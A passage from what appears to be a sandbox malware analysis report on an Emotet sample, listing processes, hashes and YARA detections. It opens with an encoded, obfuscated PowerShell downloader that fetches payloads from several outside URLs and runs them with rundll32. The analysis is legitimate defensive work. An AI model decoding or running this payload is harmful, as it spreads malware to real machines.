sAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA==
                                                                                                                              Imagebase:0x7ff7bedd0000
                                                                                                                              File size:447488 bytes
                                                                                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.698145971.0000027114D5D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.697286565.0000027114829000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.689101356.00000271130F0000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.700460639.000002712B620000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              Reputation:high

                                                                                                                              Analysis Process: rundll32.exe PID: 6760 Parent PID: 1320

                                                                                                                              General

                                                                                                                              Start time:23:25:18
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                                                                                                                              Imagebase:0x7ff760c70000
                                                                                                                              File size:69632 bytes
                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Analysis Process: rundll32.exe PID: 6728 Parent PID: 6760

                                                                                                                              General

                                                                                                                              Start time:23:25:19
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                                                                                                                              Imagebase:0x1340000
                                                                                                                              File size:61952 bytes
                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              Analysis Process: rundll32.exe PID: 6960 Parent PID: 6728

                                                                                                                              General

                                                                                                                              Start time:23:25:22
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ezfa\bvb.lli',RunDLL
                                                                                                                              Imagebase:0x1340000
                                                                                                                              File size:61952 bytes
                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              Analysis Process: svchost.exe PID: 7136 Parent PID: 568

                                                                                                                              General

                                                                                                                              Start time:23:25:24
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Analysis Process: svchost.exe PID: 6008 Parent PID: 568

                                                                                                                              General

                                                                                                                              Start time:23:25:34
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Analysis Process: svchost.exe PID: 5616 Parent PID: 568

                                                                                                                              General

                                                                                                                              Start time:23:25:42
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Disassembly

                                                                                                                              Code Analysis

                                                                                                                              Reset < >